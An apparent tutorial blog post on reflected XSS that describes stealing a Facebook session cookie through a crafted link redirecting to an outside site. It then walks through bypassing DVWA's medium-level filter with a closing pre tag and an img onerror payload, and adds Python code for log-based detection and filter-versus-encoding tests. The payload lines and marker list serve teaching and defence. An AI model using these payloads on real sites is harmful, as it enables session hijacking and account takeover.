In Part 2, I showed another reflected XSS example, basic HTML, and other HTML/JavaScript and XSS concepts. Let's look at why XSS is a risk: in all the previous examples we used a basic JavaScript payload that only shows a pop-up, so why is this pop-up so risky, and what can an attacker actually do with it?

Effect of XSS

If a web application is vulnerable to XSS, that means we can execute JavaScript. As you know, JavaScript works together with HTML, and with JavaScript the look and behaviour of a plain HTML web page can be changed completely. JavaScript lets a developer add functionality to a website that is not possible with HTML and CSS alone.

If we can execute JavaScript, we can also add functionality by modifying our JavaScript code, and the web page changes because we have injected JavaScript from our end.

If an attacker builds an XSS JavaScript payload, copies the web page link containing that payload and sends it to the victim, the JavaScript executes in the victim's browser as soon as the victim opens the link. If the attacker's XSS payload downloads malware, then when the victim clicks the link the JavaScript executes and the malware is downloaded onto the victim's system.

If an attacker creates an XSS JavaScript payload that captures the cookie of the web page, extends that payload so it also sends the captured cookie to the attacker's website, and then sends the link to the victim, the cookie is delivered to the attacker's website the moment the victim clicks the link. Let's take an example.

Suppose you are the victim and I am the attacker. You are logged in to Facebook, so you don't need to enter your password to open your Facebook account. Now suppose Facebook were vulnerable to XSS. I would create an XSS payload like this:

<script>document.location.href="allabouthack.com"</script>

and execute this payload on Facebook, so the link looks like this:

facebook.com/?s=<script>document.location.href="allabouthack.com"</script>

(?s is the search parameter in the URL.) If I send this link to you and you click it, the script executes in your browser. This script, extended to read the cookie as described above, copies your Facebook login cookie and sends it to allabouthack.com; as the admin of that site, I can then see your cookie in the allabouthack.com logs and use it to log in to your Facebook account without a username or password.
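A defender sees a reflected-XSS link like the one above only when the victim's browser requests it, so the payload lands in the web server's access log. The following is an added example, not part of the original post: a small Python scanner over constructed combined-format log lines that URL-decodes each query parameter (repeatedly, so double-encoding does not hide it) and flags the markers used by the payloads in this post. The log lines, the /search?s= path and the marker list are my own assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed web-server log lines in combined log format (not real traffic). The first two
# carry the payload shapes from this post; the third is a harmless search containing the
# English word "script", which must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search?s=%3Cscript%3Edocument.location.href%3D%22allabouthack.com%22%3C%2Fscript%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.6 - - [10/Oct/2023:13:56:01 +0000] "GET /search?s=%253Cimg+src%3D0+onerror%3Dalert%281%29%253E HTTP/1.1" 200 498 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:57:12 +0000] "GET /search?s=script+kiddie+t-shirts HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Substrings matched after URL-decoding; taken from the payloads discussed in this post.
MARKERS = ('<script', '</pre>', 'onerror=', 'document.location', 'document.cookie')

REQUEST_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"')

def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Decode repeatedly so a double-encoded payload (%253C -> %3C -> <) is still recognised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line: str):
    """Return (ip, parameter, markers_hit) when a query parameter carries a marker, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group('target')).query
    for param, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw).lower()
        hits = [marker for marker in MARKERS if marker in value]
        if hits:
            return (m.group('ip'), param, hits)
    return None

def scan_log(text: str) -> list:
    """Scan every line of an access log and collect the suspicious requests."""
    return [hit for hit in (scan_line(line) for line in text.splitlines()) if hit]

if __name__ == '__main__':
    for ip, param, hits in scan_log(SAMPLE_LOG):
        print(f'{ip} parameter {param!r} matched {hits}')
```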

We will look at different XSS payloads for all three XSS types (reflected, stored and DOM). Let's continue with reflected XSS.

DVWA Medium Security Reflected XSS

Open your DVWA, change the security level from low to medium, then click on Reflected XSS.
Now enter the script we used with low security:

<script>alert(1)</script>

Now you can see that it's not showing a pop-up and our script is not executing, because, as I said in Part 2, JavaScript won't be executed if it's inside the HTML. To confirm it, right-click, select View Page Source and search for alert.

You can see two things happening here with medium security.

1.) With medium security there is a filter in the web application that blocks our opening <script> tag. Because of that our payload is broken: the script is closed but it never starts, since the opening tag is blocked.

2.) Again, our payload is inside the HTML <pre> tag.

To solve this and execute our payload we need to understand what we can do here.

1.) We need to bypass the filter for the <script> tag because it's blocked. There are many methods, such as encoding or creating a payload that doesn't require <script>; in a real scenario we have to try all of them.

2.) Otherwise we have to create a payload that works even inside the HTML tag, or craft the payload so that it executes outside the HTML tag.

In real life, you should first find out exactly what is blocked: is script blocked as an English word, or only as the tag <script>? Apart from this, which characters are blocked, such as < > ; / ' "? Enter all of them one by one and see which are reflected and which are blocked. By doing this you get an idea of how to craft your payload manually to bypass the filter or anything else in the way.

Let's solve this DVWA medium-security level like a real-life scenario.

Method 1


In the page source shown in the picture above, you can see our input is inside a pre tag, which is closed after our input. What if we close the pre tag ourselves by entering </pre> in the search box? Let's try it: enter the following payload,
</pre><script>alert(1)</script>
submit it and view the page source. You can see that we were able to close the pre tag, but again our opening script tag is blocked.

There is one more closing pre tag after our payload, at the very end, but it doesn't matter because we have already closed the pre tag ourselves. Closing the pre tag alone achieves nothing while our opening script tag is blocked, so let's create a payload that doesn't require the opening script tag; combined with the method above, you can then execute your payload outside the HTML tag.

Method 2

Now we have to create a payload that doesn't require an opening script tag. For that you can use your JavaScript knowledge or a cheat sheet, which is a list of XSS payloads available for free. You can get XSS filter-bypass cheat sheets from OWASP and from PortSwigger (the makers of Burp Suite). For OWASP there is no single link because they have so many cheat sheets; search Google for "owasp XSS cheat sheet" and you will find them.

Now we need an XSS payload without a script tag. Let's build one with the img tag and its src attribute, so it starts like this: <img src=  The img tag adds an image to the page and src is the location where the image is stored. For the payload we don't want to add an image; we just want this img tag to execute our payload, so the source should be anything except a real image. It becomes <img src=0 (you can replace 0 with any number or string, like hello). In src we are supposed to give the address of the image we want to display on the page; we are giving an unknown value instead, so it produces an error and a broken image.

Now we add our script, which is onerror=alert(1)>. This means: if there is an error loading the image, show a pop-up saying 1. So our full payload looks like this:

<img src=0 onerror=alert(1)>


First, we add an image with the img tag, whose src is where the image would be loaded from; instead of an image we give an unknown value, so it produces an error. Then we tell the browser that if there is any error it should execute this script and show a pop-up. Now enter the above payload: it shows a pop-up, and our JavaScript has executed.
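As an added illustration (not DVWA's code and not from the original post), the Python below models the medium filter the way this walkthrough describes it, stripping only the literal opening <script> tag, and runs the three inputs from Methods 1 and 2 through that blacklist and through proper HTML output encoding. Python's html.parser stands in for the browser by reporting any <script> tag or on* event handler that reaches the rendered page. The filter model, the "Hello" wrapper and the parser check are assumptions.

```python
import html
from html.parser import HTMLParser

# Assumed model of the DVWA "medium" filter as the post describes it: only the literal
# opening <script> tag is removed, nothing else (an assumption, not DVWA's own source).
def medium_filter(user_input: str) -> str:
    return user_input.replace('<script>', '')

def render_blacklist(user_input: str) -> str:
    """Reflect the filtered input inside <pre>, as the page source in the post shows."""
    return '<pre>Hello ' + medium_filter(user_input) + '</pre>'

def render_encoded(user_input: str) -> str:
    """Hardened form: HTML-encode on output so '<', '>' and quotes can never start markup."""
    return '<pre>Hello ' + html.escape(user_input, quote=True) + '</pre>'

class ScriptSinks(HTMLParser):
    """Stand-in for the browser: records every <script> start tag and on* handler attribute."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            self.findings.append('<script>')
        for name, _value in attrs:
            if name.startswith('on'):
                self.findings.append(f'<{tag} {name}>')

def script_sinks(rendered: str) -> list:
    """Return the executable markup that survives in a rendered page (empty means inert)."""
    parser = ScriptSinks()
    parser.feed(rendered)
    parser.close()
    return parser.findings

# The three inputs this post walks through.
PAYLOADS = {
    'script tag':  '<script>alert(1)</script>',
    'close pre':   '</pre><script>alert(1)</script>',
    'img onerror': '<img src=0 onerror=alert(1)>',
}

def evaluate() -> dict:
    """Map each payload to (sinks left by the blacklist, sinks left by output encoding)."""
    return {name: (script_sinks(render_blacklist(p)), script_sinks(render_encoded(p)))
            for name, p in PAYLOADS.items()}

if __name__ == '__main__':
    for name, (weak, strong) in evaluate().items():
        print(f'{name:12} blacklist -> {weak or "inert"}   encoded -> {strong or "inert"}')
```

The blacklist stops the first two inputs only because they depend on the opening script tag, while the img/onerror input passes straight through; output encoding leaves all three inert.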
